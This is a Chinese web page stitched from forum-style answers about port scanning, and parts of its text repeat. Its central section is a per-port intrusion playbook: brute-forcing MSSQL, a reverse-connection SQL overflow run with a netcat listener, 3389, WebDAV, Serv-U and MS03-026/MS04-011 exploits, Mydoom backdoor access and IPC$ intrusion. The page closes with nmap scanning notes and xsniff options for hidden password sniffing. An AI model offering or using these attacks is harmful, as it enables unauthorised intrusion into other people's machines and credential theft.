扫描开放端口工具_网站开放的端口扫描

hacker|
258

如何扫描端口?

你是扫描自己还是别人的?扫描自己是否开放那些端口在运行-CMD-NETSTAT -NA如果是扫描别人的?首先先弄清楚什么是端口,端口的原理,尝试与目标主机的某些端口建立连接,如果目标主机该端口有回复,则说明该端口开放,即为“活动端口”。一台计算机可以有上万个端口,至于怎么扫描?咳。。。。。不好说。。。

怎么扫描端口啊?入侵技术!

各种端口的入侵 ***

1. 1433端口入侵

scanport.exe 查有1433的机器

SQLScanPas*.**e 进行字典暴破(字典是关键)

最后 SQLTool*.**e入侵

对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口

(以上反向的,测试成功)

sqlhelloz.exe 入侵ip 1433 (这个是正向连接)

2. 4899端口入侵

用4899过滤器.exe,扫描空口令的机器

3. 3899的入侵

对很早的机器,可以试试3389的溢出(win3389ex.exe)

对2000的机器,可以试试字典暴破。(tscrack.exe)

4. 80入侵

对sp3以前的机器,可以用webdav入侵;

对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)

可以利用SQL进行注入。(啊D的注入软件)。

5. serv-u入侵(21端口)

对5. 004及以下系统,可用溢出入侵。(serv5004.exe)

对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)

对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)

输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码

6. 554端口

用real554.exe入侵。

7. 6129端口

用DameWare6129.exe入侵。

8. 系统漏洞

利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,

进行溢出入侵。

9. 3127等端口

可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。

10. 其他入侵

利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。

经典IPC$入侵

11.4779端口

s扫描器 加远程控制任我行

如何扫描端口?

你是扫描自己还是别人的?扫描自己是否开放那些端口在运行-CMD-NETSTAT

-NA如果是扫描别人的?首先先弄清楚什么是端口,端口的原理,尝试与目标主机的某些端口建立连接,如果目标主机该端口有回复,则说明该端口开放,即为“活动端口”。一台计算机可以有上万个端口,至于怎么扫描?咳。。。。。不好说。。。

怎么扫描开放了某个端口的计算机

开始-运行- CMD , 输入 netstat -an 然后回车就可以查看端口

可以使用比较流行的软件XSCAN。呵呵

许多安全类网站都有。呵呵

另外推荐看看这个页面。。~~

*** 安全:Nmap端口扫描

nmap -sS minimum ip/范围

TCP SYN scans: 

nmap -sS target ip

nmap使用在连接层的Address Resolution Protocol询问target ip的MAC地址,并获得回应,但是没有TCP包。

nmap显示所有端口都被过滤了,猜想是防火墙过滤了TCP SYN的包。后来发现是虚拟机 *** 的混杂模式设为了拒绝,调成允许所有之后:

nmap发出了1000个TCPSYN,等待目标主机TCP ACK回应,打开的端口在ACK中包含Source port=自己的端口号,关闭的端口Source port=54247。

1000个端口中有四个端口打开了。

UDP scans:

nmap -sU target ip --host-timeout 100

设置timeout以免等待时间过长。

nmap发出了UDP包,等待目标主机ICMP 70/110 Destination unreachable回应。

扩大搜索范围以纳入更高端口。

nmap --top-ports 10000 target ip 

nmap -p 10000-30000 target ip 

nmap -sV -p 13337 target ip 

这是一个Apache HTTP服务器。

如何使用X-SCAN对指定的IP开放的端口扫描?

xsniff 选项

选项含义如下:

-tcp : 输出TCP数据报

-udp : 输出UDP数据报

-icmp : 输出ICMP数据报

-pass : 过滤密码信息

-hide : 后台运行

-host : 解析主机名

-addr IP地址 : 过滤IP地址

-port 端口 : 过滤端口

-log 文件名 : 将输出保存到文件

-asc : 以ASCII形式输出

-hex : 以16进制形式输出

示例:xsniff.exe -pass -hide -log pass.log

xsniff.exe -tcp -udp -asc -addr 192.168.1.1

0条大神的评论

发表评论